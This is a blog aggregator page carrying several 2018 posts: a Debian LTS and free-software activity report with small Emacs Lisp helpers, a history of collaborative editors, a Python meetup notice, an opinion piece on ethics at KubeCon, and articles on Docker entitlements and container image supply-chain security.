Skip to main content

External Blogs

My free software activities, June 2018

Anarcat - jeu, 06/28/2018 - 12:55

It's been a while since I haven't done a report here! Since I need to do one for LTS, I figured I would also catchup you up with the work I've done in the last three months. Maybe I'll make that my new process: quarterly reports would reduce the overhead on my side with little loss on you, my precious (few? many?) readers.

Debian Long Term Support (LTS)

This is my monthly Debian LTS report.

I omitted doing a report in May because I didn't spend a significant number of hours, so this also covers a handful of hours of work in May.

May and June were strange months to work on LTS, as we made the transition between wheezy and jessie. I worked on all three LTS releases now, and I must have been absent from the last transition because I felt this one was a little confusing to go through. Maybe it's because I was on frontdesk duty during that time...

For a week or two it was unclear if we should have worked on wheezy, jessie, or both, or even how to work on either. I documented which packages needed an update from wheezy to jessie and proposed a process for the transition period. This generated a good discussion, but I am not sure we resolved the problems we had this time around in the long term. I also sent patches to the security team in the hope they would land in jessie before it turns into LTS, but most of those ended up being postponed to LTS.

Most of my work this month was spent actually working on porting the Mercurial fixes from wheezy to jessie. Technically, the patches were ported from upstream 4.3 and led to some pretty interesting results in the test suite, which fails to build from source non-reproducibly. Because I couldn't figure out how to fix this in the alloted time, I uploaded the package to my usual test location in the hope someone else picks it up. The test package fixes 6 issues (CVE-2018-1000132, CVE-2017-9462, CVE-2017-17458 and three issues without a CVE).

I also worked on cups in a similar way, sending a test package to the security team for 2 issues (CVE-2017-18190, CVE-2017-18248). Same for Dokuwiki, where I sent a patch single issue (CVE-2017-18123). Those have yet to be published, however, and I will hopefully wrap that up in July.

Because I was looking for work, I ended up doing meta-work as well. I made a prototype that would use the embedded-code-copies file to populate data/CVE/list with related packages as a way to address a problem we have in LTS triage, where package that were renamed between suites do not get correctly added to the tracker. It ended up being rejected because the changes were too invasive, but led to Brian May suggesting another approach, we'll see where that goes.

I've also looked at splitting up that dreaded data/CVE/list but my results were negative: it looks like git is very efficient at splitting things up. While a split up list might be easier on editors, it would be a massive change and was eventually refused by the security team.

Other free software work

With my last report dating back to February, this will naturally be a little imprecise, as three months have passed. But let's see...

LWN

I wrote eigth articles in the last three months, for an average of three monthly articles. I was aiming at an average of one or two a week, so I didn't get reach my goal. My last article about Kubecon generated a lot of feedback, probably the best I have ever received. It seems I struck a chord for a lot of people, so that certainly feels nice.

Linkchecker

Usual maintenance work, but we at last finally got access to the Linkchecker organization on GitHub, which meant a bit of reorganizing. The only bit missing now it the PyPI namespace, but that should also come soon. The code of conduct and contribution guides were finally merged after we clarified project membership. This gives us issue templates which should help us deal with the constant flow of issues that come in every day.

The biggest concern I have with the project now is the C parser and the outdated Windows executable. The latter has been removed from the website so hopefully Windows users won't report old bugs (although that means we won't gain new Windows users at all) and the former might be fixed by a port to BeautifulSoup.

Email over SSH

I did a lot of work to switch away from SMTP and IMAP to synchronise my workstation and laptops with my mailserver. Having the privilege of running my own server has its perks: I have SSH access to my mail spool, which brings the opportunity for interesting optimizations.

The first I have done is called rsendmail. Inspired by work from Don Armstrong and David Bremner, rsendmail is a Python program I wrote from scratch to deliver email over a pipe, securely. I do not trust the sendmail command: its behavior can vary a lot between platforms (e.g. allow flushing the mailqueue or printing it) and I wanted to reduce the attack surface. It works with another program I wrote called sshsendmail which connects to it over a pipe. It integrates well into "dumb" MTAs like nullmailer but I also use it with the popular Postfix as well, without problems.

The second is to switch from OfflineIMAP to Syncmaildir (SMD). The latter allows synchronization over SSH only. The migration was a little difficult but I very much like the results: SMD is faster than OfflineIMAP and works transparently in the background.

I really like to use SSH for email. I used to have my email password stored all over the place: in my Postfix config, in my email clients' memory, it was a mess. With the new configuration, things just work unattended and email feels like a solved problem, at least the synchronization aspects of it.

Emacs

As often happens, I've done some work on my Emacs configuration. I switched to a new Solarized theme, the bbatsov version which has support for a light and dark mode and generally better colors. I had problems with the cursor which are unfortunately unfixed.

I learned about and used the Emacs iPython Notebook project (EIN) and filed a feature request to replicate the "restart and run" behavior of the web interface. Otherwise it's real nice to have a decent editor to work on Python notebooks and I have used this to work on the terminal emulators series and the related source code

I have also tried to complete my conversion to Magit, a pretty nice wrapper around git for Emacs. Some of my usual git shortcuts have good replacements, but not all. For example, those are equivalent:

  • vc-annotate (C-x C-v g): magit-blame
  • vc-diff (C-x C-v =): magit-diff-buffer-file

Those do not have a direct equivalent:

  • vc-next-action (C-x C-q, or F6): anarcat/magic-commit-buffer, see below
  • vc-git-grep (F8): no replacement

I wrote my own replacement for "diff and commit this file" as the following function:

(defun anarcat/magit-commit-buffer () "commit the changes in the current buffer on the fly This is different than `magit-commit' because it calls `git commit' without going through the staging area AKA index first. This is a replacement for `vc-next-action'. Tip: setting the git configuration parameter `commit.verbose' to 2 will show the diff in the changelog buffer for review. See `git-config(1)' for more information. An alternative implementation was attempted with `magit-commit': (let ((magit-commit-ask-to-stage nil)) (magit-commit (list \"commit\" \"--\" (file-relative-name buffer-file-name))))) But it seems `magit-commit' asserts that we want to stage content and will fail with: `(user-error \"Nothing staged\")'. This is why this function calls `magit-run-git-with-editor' directly instead." (interactive) (magit-run-git-with-editor (list "commit" "--" (file-relative-name buffer-file-name))))

It's not very pretty, but it works... Mostly. Sometimes the magit-diff buffer becomes out of sync, but the --verbose output in the commitlog buffer still works.

I've also looked at git-annex integration. The magit-annex package did not work well for me: the file listing is really too slow. So I found the git-annex.el package, but did not try it out yet.

While working on all of this, I fell in a different rabbit hole: I found it inconvenient to "pastebin" stuff from Emacs, as it would involve selection a region, piping to pastebinit and copy-pasting the URL found in the *Messages* buffer. So I wrote this first prototype:

(defun pastebinit (begin end) "pass the region to pastebinit and add output to killring TODO: prompt for possible pastebins (pastebinit -l) with prefix arg Note that there's a `nopaste.el' project which already does this, which we should use instead. " (interactive "r") (message "use nopaste.el instead") (let ((proc (make-process :filter #'pastebinit--handle :command '("pastebinit") :connection-type 'pipe :buffer nil :name "pastebinit"))) (process-send-region proc begin end) (process-send-eof proc))) (defun pastebinit--handle (proc string) "handle output from pastebinit asynchronously" (let ((url (car (split-string string)))) (kill-new url) (message "paste uploaded and URL added to kill ring: %s" url)))

It was my first foray into aynchronous process operations in Emacs: difficult and confusing, but it mostly worked. Those who know me know what's coming next, however: I found not only one, but two libraries for pastebins in Emacs: nopaste and (after patching nopaste to add asynchronous support and customize support of course) debpaste.el. I'm not sure where that will go: there is a proposal to add nopaste in Debian that was discussed a while back and I made a detailed report there.

Monkeysign

I made a minor release of Monkeysign to cover for CVE-2018-12020 and its GPG sigspoof vulnerability. I am not sure where to take this project anymore, and I opened a discussion to possibly retire the project completely. Feedback welcome.

ikiwiki

I wrote a new ikiwiki plugin called bootstrap to fix table markup to match what the Bootstrap theme expects. This was particularly important for the previous blog post which uses tables a lot. This was surprisingly easy and might be useful to tweak other stuff in the theme.

Random stuff
  • I wrote up a review of security of APT packages when compared with the TUF project, in TufDerivedImprovements
  • contributed to about 20 different repositories on GitHub, too numerous to list here
Catégories: External Blogs

Historical inventory of collaborative editors

Anarcat - mar, 06/26/2018 - 13:19

A quick inventory of major collaborative editor efforts, in chronological order.

As with any such list, it must start with an honorable mention to the mother of all demos during which Doug Engelbart presented what is basically an exhaustive list of all possible software written since 1968. This includes not only a collaborative editor, but graphics, programming and math editor.

Everything else after that demo is just a slower implementation to compensate for the acceleration of hardware.

Software gets slower faster than hardware gets faster. - Wirth's law

So without further ado, here is the list of notable collaborative editors that I could find. By "notable" i mean that they introduce a notable feature or implementation detail.

Project Date Platform Notes SubEthaEdit 2003-2015? Mac-only first collaborative, real-time, multi-cursor editor I could find. An reverse-engineering attempt in Emacs failed to produce anything. DocSynch 2004-2007 ? built on top of IRC! Gobby 2005-now C, multi-platform first open, solid and reliable implementation and still around! The protocol ("libinfinoted") is notoriously hard to port to other editors (e.g. Rudel failed to implement this in Emacs). 0.7 release in jan 2017 adds possible python bindings that might improve this. Interesting plugins: autosave to disk. Ethercalc 2005-now Web, Javascript First spreadsheet, along with Google docs moonedit 2005-2008? ? Original website died. Other user's cursors visible and emulated keystrokes noises. Included a calculator and music sequencer! synchroedit 2006-2007 ? First web app. Inkscape 2007-2011 C++ First graphics editor with collaborative features backed by the "whiteboard" plugin built on top of Jabber, now defunct. Abiword 2008-now C++ First word processor Etherpad 2008-now Web First solid web app. Originally developped as a heavy Java app in 2008, acquired and opensourced by Google in 2009, then rewritten in Node.js in 2011. Widely used. Wave 2009-2010 Web, Java Failed attempt at a grand protocol unification CRDT 2011 Specification Standard for replicating a document's datastructure among different computers reliably. Operational transform 2013 Specification Similar to CRDT, yet, well, different. Floobits 2013-now ? Commercial, but opensource plugins for different editors LibreOffice Online 2015-now Web free Google docs equivalent, now integrated in Nextcloud HackMD 2015-now ? Commercial but opensource. Inspired by hackpad, which was bought up by Dropbox. Cryptpad 2016-now web? spin-off of xwiki. encrypted, "zero-knowledge" on server Prosemirror 2016-now Web, Node.JS "Tries to bridge the gap between Markdown text editing and classical WYSIWYG editors." Not really an editor, but something that can be used to build one. Qill 2013-now Web, Node.JS Rich text editor, also javascript. Not sure it is really collaborative. Teletype 2017-now WebRTC, Node.JS For the GitHub's Atom editor, introduces "portal" idea that makes guests follow what the host is doing across multiple docs. p2p with webRTC after visit to introduction server, CRDT based. Tandem 2018-now Node.JS? Plugins for atom, vim, neovim, sublime... uses a relay to setup p2p connexions CRDT based. Dubious license issues were resolved thanks to the involvement of Debian developers, which makes it a promising standard to follow in the future. Other lists
Catégories: External Blogs

Montréal-Python 72 - Carroty Xenophon

Montreal Python - dim, 06/03/2018 - 23:00

Let’s meet one last time before our Summer break! Thanks to Notman House for sponsoring this event.

Presentations Socket - Éric Lafontaine

Most of our everyday job include doing request over the internet or hosting a web solution for our company. Each connections we make utilize the socket API in some way that is not always evident. I hope to, by giving this talk, elucidate some of the magic contained in the socket API. I'm also going to give away some trick that I've been using since understanding that API.

Probabilistic Programming and Bayesian Modeling with PyMC3 - Christopher Fonnesbeck

Bayesian statistics offers powerful, flexible methods for data analysis that, because they are based on full probability models, confer several benefits to analysts including scalability, straightforward quantification of uncertainty, and improved interpretability relative to classical methods. The advent of probabilistic programming has served to abstract the complexity associated with fitting Bayesian models, making such methods more widely available. PyMC3 is software for probabilistic programming in Python that implements several modern, computationally-intensive statistical algorithms for fitting Bayesian models. PyMC3’s intuitive syntax is helpful for new users, and its reliance on the Theano library for fast computation has allowed developers to keep the code base simple, making it easy to extend and expand the software to meet analytic needs. Importantly, PyMC3 implements several next-generation Bayesian computational methods, allowing for more efficient sampling for small models and better approximations to larger models with larger associated dataset. I will demonstrate how to construct, fit and check models in PyMC, using a selection of applied problems as motivation.

When

Monday June 11th, 2018 at 6PM

Where

Notman House

51 Sherbrooke West

Montréal, QC

H2X 1X2

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:00PM - End of the event
  • 8:15PM - Benelux
Catégories: External Blogs

Diversity, education, privilege and ethics in technology

Anarcat - sam, 05/26/2018 - 11:48

This article is part of a series on KubeCon Europe 2018.

This is a rant I wrote while attending KubeCon Europe 2018. I do not know how else to frame this deep discomfort I have with the way one of the most cutting edge projects in my community is moving. I see it as a symptom of so many things wrong in society at large and figured it was as good a way as any to open the discussion regarding how free software communities seem to naturally evolved into corporate money-making machines with questionable ethics.

A white man groomed by a white woman

Diversity and education

There is often a great point made of diversity at KubeCon, and that is something I truly appreciate. It's one of the places where I have seen the largest efforts towards that goal; I was impressed by the efforts done in Austin, and mentioned it in my overview of that conference back then. Yet it is still one of the less diverse places I've ever participated in: in comparison, Pycon "feels" more diverse, for example. And then, of course, there's real life out there, where women constitute basically half the population, of course. This says something about the actual effectiveness diversity efforts in our communities.

4000 white men

The truth is that contrary to programmer communities, "operations" knowledge (sysadmin, SRE, DevOps, whatever it's called these days) comes not from institutional education, but from self-learning. Even though I have years of university training, the day to day knowledge I need in my work as a sysadmin comes not from the university, but from late night experiments on my personal computer network. This was first on the Macintosh, then on the FreeBSD source code of passed down as a magic word from an uncle and finally through Debian consecrated as the leftist's true computing way. Sure, my programming skills were useful there, but I acquired those before going to university: even there teachers expected students to learn programming languages (such as C!) in-between sessions.

Diversity program

The real solutions to the lack of diversity in our communities not only comes from a change in culture, but also real investments in society at large. The mega-corporations subsidizing events like KubeCon make sure they get a lot of good press from those diversity programs. However, the money they spend on those is nothing compared to tax evasion in their home states. As an example, Amazon recently put 7000 jobs on hold because of a tax the city of Seattle wanted to impose on corporations to help the homeless population. Google, Facebook, Microsoft, and Apple all evade taxes like gangsters. This is important because society changes partly through education, and that costs money. Education is how more traditional STEM sectors like engineering and medicine have changed: women, minorities, and poorer populations were finally allowed into schools after the epic social struggles of the 1970s finally yielded more accessible education. The same way that culture changes are seeing a backlash, the tide is turning there as well and the trend is reversing towards more costly, less accessible education of course. But not everywhere. The impacts of education changes are long-lasting. By evading taxes, those companies are keeping the state from revenues that could level the playing field through affordable education.

Hell, any education in the field would help. There is basically no sysadmin education curriculum right now. Sure you can follow a Cisco CCNA or MSCE private trainings. But anyone who's been seriously involved in running any computing infrastructure knows those are a scam: that will tie you down in a proprietary universe (Cisco and Microsoft, respectively) and probably just to "remote hands monkey" positions and rarely to executive positions.

Velocity

Besides, providing an education curriculum would require the field to slow down so that knowledge would settle down and trickle into a curriculum. Configuration management is pretty old, but because the changes in tooling are fast, any curriculum built in the last decade (or even less) quickly becomes irrelevant. Puppet publishes a new release every 6 month, Kubernetes is barely 4 years old now, and is changing rapidly with a ~3 month release schedule.

Here at KubeCon, Mark Zuckerberg's mantra of "move fast and break things" is everywhere. We call it "velocity": where you are going does not matter as much as how fast you're going there. At one of the many keynotes, Abby Kearns from the Cloud Foundry Foundation boasted at how Home Depot, in trying to sell more hammers than Amazon, is now deploying code to production multiple times a day. I am still unclear as whether this made Home Depot actually sell more hammers, or if it's something that we should even care about in the first place. Shouldn't we converge over selling less hammers? Making them more solid, reliable, so that they are passed down from generations instead of breaking and having to be replaced all the time?

Home Depot ecstasy

We're solving a problem that wasn't there in some new absurd faith that code deployments will naturally make people happier, by making sure Home Depot sells more hammers. And that's after telling us that Cloud Foundry helped the USAF save 600M$ by moving their databases to the cloud. No one seems bothered by the idea that the most powerful military in existence would move state secrets into a private cloud, out of the control of any government. It's the name of the game, at KubeCon.

USAF saves (money)

In his keynote, Alexis Richardson, CEO of Weaveworks, presented the toaster project as an example of what not to do. "He did not use any sourced components, everything was built from scratch, by hand", obviously missing the fact that toasters are deliberately not built from reusable parts, as part of the planned obsolescence design. The goal of the toaster experiment is also to show how fragile our civilization has become precisely because we depend on layers upon layers of parts. In this totalitarian view of the world, people are also "reusable" or, in that case "disposable components". Not just the white dudes in California, but also workers outsourced out of the USA decades ago; it depends on precious metals and the miners of Africa, the specialized labour of the factories and intricate knowledge of the factory workers in Asia, and the flooded forests of the first nations powering this terrifying surveillance machine.

Privilege

"Left to his own devices he couldn’t build a toaster. He could just about make a sandwich and that was it." -- Mostly Harmless, Douglas Adams, 1992

Staying in an hotel room for a week, all expenses paid, certainly puts things in perspectives. Rarely have I felt more privileged in my entire life: someone else makes my food, makes my bed, and cleans up the toilet magically when I'm gone. For me, this is extraordinary, but for many people at KubeCon, it's routine: traveling is part of the rock star agenda of this community. People get used to being served, both directly in their day to day lives, but also through the complex supply chain of the modern technology that is destroying the planet.

Nothing is like corporate nothing.

The nice little boxes and containers we call the cloud all abstract this away from us and those dependencies are actively encouraged in the community. We like containers here and their image is ubiquitous. We acknowledge that a single person cannot run a Kube shop because the knowledge is too broad to be possibly handled by a single person. While there are interesting collaborative and social ideas in that approach, I am deeply skeptical of its impact on civilization in the long run. We already created systems so complex that we don't truly know who hacked the Trump election or how. Many feel it was, but it's really just a hunch: there were bots, maybe they were Russian, or maybe from Cambridge? The DNC emails, was that really Wikileaks? Who knows! Never mind failing close or open: the system has become so complex that we don't even know how we fail when we do. Even those in the highest positions of power seem unable to protect themselves; politics seem to have become a game of Russian roulette: we cock the bot, roll the secret algorithm, and see what dictator will shoot out.

Ethics

All this is to build a new Skynet; not this one or that one, those already exist. I was able to pleasantly joke about the AI takeover during breakfast with a random stranger without raising as much as an eyebrow: we know it will happen, oh well. I've skipped that track in my attendance, but multiple talks at KubeCon are about AI, TensorFlow (it's opensource!), self-driving cars, and removing humans from the equation as much as possible, as a general principle. Kubernetes is often shortened to "Kube", which I always think of as a reference to the Star Trek Borg all mighty ship, the "cube". This might actually make sense given that Kubernetes is an open source version of Google's internal software incidentally called... Borg. To make such fleeting, tongue-in-cheek references to a totalitarian civilization is not harmless: it makes more acceptable the notion that AI domination is inescapable and that resistance truly is futile, the ultimate neo-colonial scheme.

"We are the Borg. Your biological and technological distinctiveness will be added to our own. Resistance is futile."

The "hackers" of our age are building this machine with conscious knowledge of the social and ethical implications of their work. At best, people admit to not knowing what they really are. In the worse case scenario, the AI apocalypse will bring massive unemployment and a collapse of the industrial civilization, to which Silicon Valley executives are responding by buying bunkers to survive the eventual roaming gangs of revolted (and now armed) teachers and young students coming for revenge.

Only the most privileged people in society could imagine such a scenario and actually opt out of society as a whole. Even the robber barons of the 20th century knew they couldn't survive the coming revolution: Andrew Carnegie built libraries after creating the steel empire that drove much of US industrialization near the end of the century and John D. Rockefeller subsidized education, research and science. This is not because they were humanists: you do not become an oil tycoon by tending to the poor. Rockefeller said that "the growth of a large business is merely a survival of the fittest", a social darwinist approach he gladly applied to society as a whole.

But the 70's rebel beat offspring, the children of the cult of Job, do not seem to have the depth of analysis to understand what's coming for them. They want to "hack the system" not for everyone, but for themselves. Early on, we have learned to be selfish and self-driven: repressed as nerds and rejected in the schools, we swore vengeance on the bullies of the world, and boy are we getting our revenge. The bullied have become the bullies, and it's not small boys in schools we're bullying, it is entire states, with which companies are now negotiating as equals.

The fraud

...but what are you creating exactly?

And that is the ultimate fraud: to make the world believe we are harmless little boys, so repressed that we can't communicate properly. We're so sorry we're awkward, it's because we're all somewhat on the autism spectrum. Isn't that, after all, a convenient affliction for people that would not dare to confront the oppression they are creating? It's too easy to hide behind such a real and serious condition that does affect people in our community, but also truly autistic people that simply cannot make it in the fast-moving world the magical rain man is creating. But the real con is hacking power and political control away from traditional institutions, seen as too slow-moving to really accomplish the "change" that is "needed". We are creating an inextricable technocracy that no one will understand, not even us "experts". Instead of serving the people, the machine is at the mercy of markets and powerful oligarchs.

A recurring pattern at Kubernetes conferences is the KubeCon chant where Kelsey Hightower reluctantly engages the crowd in a pep chant:

When I say 'Kube!', you say 'Con!'

'Kube!' 'Con!' 'Kube!' 'Con!' 'Kube!' 'Con!'

Cube Con indeed...

I wish I had some wise parting thoughts of where to go from here or how to change this. The tide seems so strong that all I can do is observe and tell stories. My hope is that the people that need to hear this will take it the right way, but I somehow doubt it. With chance, it might just become irrelevant and everything will fix itself, but somehow I fear things will get worse before they get better.

Catégories: External Blogs

Easier container security with entitlements

Anarcat - lun, 05/21/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

During KubeCon + CloudNativeCon Europe 2018, Justin Cormack and Nassim Eddequiouaq presented a proposal to simplify the setting of security parameters for containerized applications. Containers depend on a large set of intricate security primitives that can have weird interactions. Because they are so hard to use, people often just turn the whole thing off. The goal of the proposal is to make those controls easier to understand and use; it is partly inspired by mobile apps on iOS and Android platforms, an idea that trickled back into Microsoft and Apple desktops. The time seems ripe to improve the field of container security, which is in desperate need of simpler controls.

The problem with container security

Cormack first stated that container security is too complicated. His slides stated bluntly that "unusable security is not security" and he pleaded for simpler container security mechanisms with clear guarantees for users.

"Container security" is a catchphrase that actually includes all sorts of measures, some of which we have previously covered. Cormack presented an overview of those mechanisms, including capabilities, seccomp, AppArmor, SELinux, namespaces, control groups — the list goes on. He showed how docker run --help has a "ridiculously large number of options"; there are around one hundred on my machine, with about fifteen just for security mechanisms. He said that "most developers don't know how to actually apply those mechanisms to make sure their containers are secure". In the best-case scenario, some people may know what the options are, but in most cases people don't actually understand each mechanism in detail.

He gave the example of capabilities; there are about forty possible values that can be provided for the --cap-drop option, each with its own meaning. He described some capabilities as "understandable", but said that others end up in overly broad boxes. The kernel's data structure limits the system to a maximum of 64 capabilities, so a bunch of functionality was lumped together into CAP_SYS_ADMIN, he said.

Cormack also talked about namespaces and seccomp. While there are fewer namespaces than capabilities, he said that "it's very unclear for a general user what their security properties are". For example, "some combinations of capabilities and namespaces will let you escape from a container, and other ones don't". He also described seccomp as a "long JSON file" as that's the way Kubernetes configures it. Even though he said those files could "usefully be even more complicated" and said that the files are "very difficult to write".

Cormack stopped his enumeration there, but the same applies to the other mechanisms. He said that while developers could sit down and write those policies for their application by hand, it's a real mess and makes their heads explode. So instead developers run their containers in --privileged mode. It works, but it disables all the nice security mechanisms that the container abstraction provides. This is why "containers do not contain", as Dan Walsh famously quipped.

Introducing entitlements

There must be a better way. Eddequiouaq proposed this simple idea: "provide something humans can actually understand without diving into code or possibly even without reading documentation". The solution proposed by the Docker security team is "entitlements": the ability for users to choose simple permissions on the command line. Eddequiouaq said that application users and developers alike don't need to understand the low-level security mechanisms or how they interact within the kernel; "people don't care about that, they want to make sure their app is secure."

Entitlements divide resources into meaningful domains like "network", "security", or "host resources" (like devices). Behind the scenes, Docker translates those into whatever security mechanisms are available. This implies that the actual mechanism deployed will vary between runtimes, depending on the implementation. For example, a "confined" network access might mean a seccomp filter blocking all networking-related system calls except socket(AF_UNIX|AF_LOCAL) along with dropping network-related capabilities. AppArmor will deny network on some platforms while SELinux would do similar enforcement on others.

Eddequiouaq said the complexity of implementing those mechanisms is the responsibility of platform developers. Image developers can ship entitlement lists along with container images created with a regular docker build, and sign the whole bundle with docker trust. Because entitlements do not specify explicit low-level mechanisms, the resulting image is portable to different runtimes without change. Such portability helps Kubernetes on non-Linux platforms do its job.

Entitlements shift the responsibility for configuring sandboxing environments to image developers, but also empowers them to deliver security mechanisms directly to end users. Developers are the ones with the best knowledge about what their applications should or should not be doing. Image end-users, in turn, benefit from verifiable security properties delivered by the bundles and the expertise of image developers when they docker pull and run those images.

Eddequiouaq gave a demo of the community's nemesis: Docker inside Docker (DinD). He picked that use case because it requires a lot of privileges, which usually means using the dreaded --privileged flag. With the entitlements patch, he was able to run DinD with network.admin, security.admin, and host.devices.admin, which looks like --privileged, but actually means some protections are still in place. According to Eddequiouaq, "everything works and we didn't have to disable all the seccomp and AppArmor profiles". He also gave a demo of how to build an image and demonstrated how docker inspect shows the entitlements bundled inside the image. With such an image, docker run starts a DinD image without any special flags. That requires a way to trust the content publisher because suddenly images can elevate their own privileges without the caller specifying anything on the Docker command line.

Goals and future

The specification aims to provide the best user experience possible, so that people actually start using the security mechanisms provided by the platforms instead of opting out of security configurations when they get a "permission denied" error. Eddequiouaq said that Docker eventually wants to "ditch the --privileged flag because it is really a bad habit". Instead, applications should run with the least privileges they need. He said that "this is not the case; currently, everyone works with defaults that work with 95% of the applications out there." Those Docker defaults, he said, provide a "way too big attack surface".

Eddequiouaq opened the door for developers to define custom entitlements because "it's hard to come up with a set that will cover all needs". One way the team thought of dealing with that uncertainty is to have versions of the specification but it is unclear how that would work in practice. Would the version be in the entitlement labels (e.g. network-v1.admin), or out of band?

Another feature proposed is the control of API access and service-to-service communication in the security profile. This is something that's actually available on phones, where an app can only talk with a specific set of services. But that is also relevant to containers in Kubernetes clusters as administrators often need to restrict network access with more granularity than the "open/filter/close" options. An example of such policy could allow the "web" container to talk with the "database" container, although it might be difficult to specify such high-level policies in practice.

While entitlements are now implemented in Docker as a proof of concept, Kubernetes has the same usability issues as Docker so the ultimate goal is to get entitlements working in Kubernetes runtimes directly. Indeed, its PodSecurityPolicy maps (almost) one-to-one with the Docker security flags. But as we have previously reported, another challenge in Kubernetes security is that the security models of Kubernetes and Docker are not exactly identical.

Eddequiouaq said that entitlements could help share best security policies for a pod in Kubernetes. He proposed that such configuration would happen through the SecurityContext object. Another way would be an admission controller that would avoid conflicts between the entitlements in the image and existing SecurityContext profiles already configured in the cluster. There are two possible approaches in that case: the rules from the entitlements could expand the existing configuration or restrict it where the existing configuration becomes a default. The problem here is that the pod's SecurityContext already provides a widely deployed way to configure security mechanisms, even if it's not portable or easy to share, so the proposal shouldn't break existing configurations. There is work in progress in Docker to allow inheriting entitlements within a Dockerfile. Eddequiouaq proposed that Kubernetes should implement a simple mechanism to inherit entitlements from images in the admission controller.

The Docker security team wants to create a "widely adopted standard" supported by Docker swarm, Kubernetes, or any container scheduler. But it's still unclear how deep into the Kubernetes stack entitlements belong. In the team's current implementation, Docker translates entitlements into the security mechanisms right before calling its runtime (containerd), but it might be possible to push the entitlements concept straight into the runtime itself, as it knows best how the platform operates.

Some readers might also notice fundamental similarities between this and other mechanisms such as OpenBSD's pledge(), which made me wonder if entitlements belong in user space in the first place. Cormack observed that seccomp was such a "pain to work with to do complicated policies". He said that having eBPF seccomp filters would make it easier to deal with conflicts between policies and also mentioned the work done on the Checmate and Landlock security modules as interesting avenues to explore. It seems that none of those kernel mechanisms are ready for prime time, at least not to the point that Docker can use them in production. Eddequiouaq said that the proposal was open to changes and discussion so this is all work in progress at this stage. The next steps are to make a proposal to the Kubernetes community before working on an actual implementation outside of Docker.

I have found the core idea of protecting users from all the complicated stuff in container security interesting. It is a recurring theme in container security; we've previously discussed proposals to add container identifiers in the kernel directly for example. Everyone knows security is sensitive and important in Kubernetes, yet doing it correctly is hard. This is a recipe for disaster, which has struck in high profile cases recently. Hopefully having such easier and cleaner mechanisms will help users, developers, and administrators alike.

A YouTube video and slides [PDF] of the talk are available.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Securing the container image supply chain

Anarcat - jeu, 05/17/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

KubeCon EU "Security is hard" is a tautology, especially in the fast-moving world of container orchestration. We have previously covered various aspects of Linux container security through, for example, the Clear Containers implementation or the broader question of Kubernetes and security, but those are mostly concerned with container isolation; they do not address the question of trusting a container's contents. What is a container running? Who built it and when? Even assuming we have good programmers and solid isolation layers, propagating that good code around a Kubernetes cluster and making strong assertions on the integrity of that supply chain is far from trivial. The 2018 KubeCon + CloudNativeCon Europe event featured some projects that could eventually solve that problem.

Image provenance

A first talk, by Adrian Mouat, provided a good introduction to the broader question of "establishing image provenance and security in Kubernetes" (video, slides [PDF]). Mouat compared software to food you get from the supermarket: "you can actually tell quite a lot about the product; you can tell the ingredients, where it came from, when it was packaged, how long it's good for". He explained that "all livestock in Europe have an animal passport so we can track its movement throughout Europe and beyond". That "requires a lot of work, and time, and money, but we decided that this is was worthwhile doing so that we know [our food is] safe to eat. Can we say the same thing about the software running in our data centers?" This is especially a problem in complex systems like Kubernetes; containers have inherent security and licensing concerns, as we have recently discussed.

You should be able to easily tell what is in a container: what software it runs, where it came from, how it was created, and if it has any known security issues, he said. Mouat also expects those properties to be provable and verifiable with strong cryptographic assertions. Kubernetes can make this difficult. Mouat gave a demonstration of how, by default, the orchestration framework will allow different versions of the same container to run in parallel. In his scenario, this is because the default image pull policy (ifNotPresent) might pull a new version on some nodes and not others. This problem arises because of an inconsistency between the way Docker and Kubernetes treat image tags; the former as mutable and the latter as immutable. Mouat said that "the default semantics for pulling images in Kubernetes are confusing and dangerous." The solution here is to deploy only images with tags that refer to a unique version of a container, for example by embedding a Git hash or unique version number in the image tag. Obviously, changing the policy to AlwaysPullImages will also help in solving the particular issue he demonstrated, but will create more image churn in the cluster.

But that's only a small part of the problem; even if Kubernetes actually runs the correct image, how can you tell what is actually in that image? In theory, this should be easy. Docker seems like the perfect tool to create deterministic images that consist exactly of what you asked for: a clean and controlled, isolated environment. Unfortunately, containers are far from reproducible and the problem begins on the very first line of a Dockerfile. Mouat gave the example of a FROM debian line, which can mean different things at different times. It should normally refer to Debian "stable", but that's actually a moving target; Debian makes new stable releases once in a while, and there are regular security updates. So what first looks like a static target is actually moving. Many Dockerfiles will happily fetch random source code and binaries from the network. Mouat encouraged people to at least checksum the downloaded content to prevent basic attacks and problems.

Unfortunately, all this still doesn't get us reproducible builds since container images include file timestamps, build identifiers, and image creation time that will vary between builds, making container images hard to verify through bit-wise comparison or checksums. One solution there is to use alternative build tools like Bazel that allow you to build reproducible images. Mouat also added that there is "tension between reproducibility and keeping stuff up to date" because using hashes in manifests will make updates harder to deploy. By using FROM debian, you automatically get updates when you rebuild that container. Using FROM debian:stretch-20180426 will get you a more reproducible container, but you'll need to change your manifest regularly to follow security updates. Once we know what is in our container, there is at least a standard in the form of the OCI specification that allows attaching annotations to document the contents of containers.

Another problem is making sure containers are up to date, a "weirdly hard" question to answer according to Mouat: "why can't I ask my registry [if] there is new version of [a] tag, but as far as I know, there's no way you can do that." Mouat literally hand-waved at a slide showing various projects designed to scan container images for known vulnerabilities, introducing Aqua, Clair, NeuVector, and Twistlock. Mouat said we need a more "holistic" solution than the current whack-a-mole approach. His company is working on such a product called Trow, but not much information about it was available at the time of writing.

The long tail of the supply chain

Verifying container images is exactly the kind of problem Notary is designed to solve. Notary is a server "that allows anyone to have trust over arbitrary collections of data". In practice, that can be used by the Docker daemon as an additional check before fetching images from the registry. This allows operators to approve images with cryptographic signatures before they get deployed in the cluster.

Notary implements The Update Framework (TUF), a specification covering the nitty-gritty details of signatures, key rotation, and delegation. It keeps signed hashes of container images that can be used for verification; it can be deployed by enabling Docker's "content Trust" in any Docker daemon, or by configuring a custom admission controller with a web hook in Kubernetes. In another talk (slides [PDF], video) Liam White and Michael Hough covered the basics of Notary's design and how it interacts with Docker. They also introduced Porteiris as an admission controller hook that can implement a policy like "allow any image from the LWN Docker registry as long as it's signed by your favorite editor". Policies can be scoped by namespace as well, which can be useful in multi-tenant clusters. The downside of Porteris is that it supports only IBM Cloud Notary servers because the images need to be explicitly mapped between the Notary server and the registry. The IBM team knows only about how to map its own images but the speakers said they were open to contributions there.

